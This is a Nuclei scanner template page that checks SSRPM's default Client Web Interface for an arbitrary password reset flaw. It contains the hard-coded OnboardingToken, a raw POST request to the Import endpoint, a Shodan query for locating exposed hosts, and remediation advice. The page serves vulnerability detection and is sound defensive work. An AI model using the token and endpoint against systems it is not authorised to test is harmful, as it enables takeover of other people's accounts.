Skip to content
Nuclei Templates

SSRPM - Arbitary Password Reset on Default Client Interface Installation

ID: ssrpm-arbitrary-password-reset

Severity: high

Author: vince-isec

Tags: ssrpm,intrusive

Description

Section titled “Description”

The default installation of the Client Web Interface, which is provided alongside the COM SSRPM service, defines a hard-coded secret token for the Import endpoint. This endpoint allows registering new accounts or overwriting existing onboarding data for an arbitrary account, which ultimately allows changing the password of an arbitrary account.

YAML Source

Section titled “YAML Source”
id: ssrpm-arbitrary-password-reset


info:
  name: SSRPM - Arbitary Password Reset on Default Client Interface Installation
  author: vince-isec
  severity: high
  description: |
    The default installation of the Client Web Interface, which is provided alongside the COM SSRPM service, defines a hard-coded secret token for the Import endpoint. This endpoint allows registering new accounts or overwriting existing onboarding data for an arbitrary account, which ultimately allows changing the password of an arbitrary account.
  remediation: Set a new and random value to the OnboardingToken setting. Install the new version of SSRPM and its web interface.
  reference:
    - https://www.synacktiv.com/advisories/ssrpm-arbitrary-password-reset-on-default-client-web-interface-installation
  metadata:
    shodan-query: http.favicon.hash:-916902413
    max-request: 1
    verified: true
  tags: ssrpm,intrusive


variables:
  string: "{{to_lower(rand_text_alpha(5))}}"


http:
  - raw:
      - |
        POST /Onboarding/Import HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        OnboardingToken=7e30bebc-d17c-4833-98b6-d4c09e076b24&Action={{string}}


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"ErrorCode":-55'
          - '"Success":false'
        condition: and


      - type: word
        part: content_type
        words:
          - 'application/json'


      - type: status
        status:
          - 200


    extractors:
      - type: kval
        kval:
          - string
# digest: 4a0a00473045022054e83e4f1c9710635a65d02c970f2aed29064c24cb12ed212b1e797a172c8386022100c72f534f25a61db97c8f0b74c55081a9bde45a33000f03d5b0a51b0b9358889d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/misconfiguration/ssrpm-arbitrary-password-reset.yaml"

View on Github